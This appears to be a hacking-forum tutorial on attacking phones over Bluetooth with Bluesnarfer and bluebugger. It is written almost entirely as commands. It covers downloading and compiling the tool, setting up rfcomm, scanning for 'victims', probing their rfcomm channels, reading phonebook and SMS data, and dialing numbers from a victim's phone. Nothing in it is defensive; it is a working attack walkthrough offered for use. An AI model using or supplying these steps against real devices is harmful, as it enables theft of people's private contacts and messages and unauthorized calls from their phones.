A brief tutorial on how to hack a phone via Bluetooth using Bluesnarfer. For Backtrack/Kali Linux: First, we must install Bluesnarfer Make your way to the opt directory.
cd /opt
Get Bluesnarfer using the wget command
/opt# wget http://alighieri.org/tools/bluesnarfer.tar.gz
Reopen the directory using the ls command and you will see Bluesnarfer in there, now we have to extract it.
/opt# ls
To extract we use the simple tar xvf command
/opt# tar xvf bluesnarfer.tar.gz
Reopen the directory once again and you will see Bluesnarfer there
/opt# ls
Let’s enter that folder so
/opt# cd bluesnarfer
Now we finish it off by compiling the installation like this
/opt/bluesnarfer# make
To see all of the Bluesnarfer commands run this command ./bluesnarfer
:/opt/bluesnarfer# ./bluesnarfer
Now that we have Bluesnarfer, you must configure rfcomm first, if you haven’t already done that,
mkdir -p /dev/bluetooth/rfcomm mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0 mknod --mode=666 /dev/rfcomm0 c 216 0 hciconfig -i hci0 up hciconfig hci0
(Scan for victims)
hcitool scan hci0
(ping the victim to see if he is awake)
l2ping < victim mac addr>
(browse the victim for rfcomm channels to connect to)
sdptool browse --tree --l2cap < mac addr >
(then you can use bluesnarfer for example to read the victim’s phonebook, dial a number or read Sms or other things.)
Bluesnarfer -r 1-100 -C 7 -b < mac addr >
(to see available options to do )
bluebugger -h
(Dial number )
bluebugger -m < victim name > -c 7 -a < mac addr > Dial < number >
Extra: This is what the Bluesnarfer shell should look like
bluesnarfer, version 0.1 - usage: bluesnarfer [options] [ATCMD] -b bt_addrATCMD: valid AT+CMD (GSM EXTENSION)TYPE: valid phonebook type .. example: "DC" (dialed call list) "SM" (SIM phonebook) "RC" (recevied call list) "XX" much more-b bdaddr: Bluetooth device address -C chan: Bluetooth rfcomm channel-c ATCMD: custom action -r N-M: read phonebook entry N to M -w N-M: delete phonebook entry N to M -f name: search "name" in phonebook address -s TYPE: select phonebook memory storage -l: list available phonebook memory storage -i: device info
If you have any questions regarding Bluetooth hacking or need help capturing packets or anything specific make sure to post your thread here: https://hacktoday.io/c/wifi-hacking/7
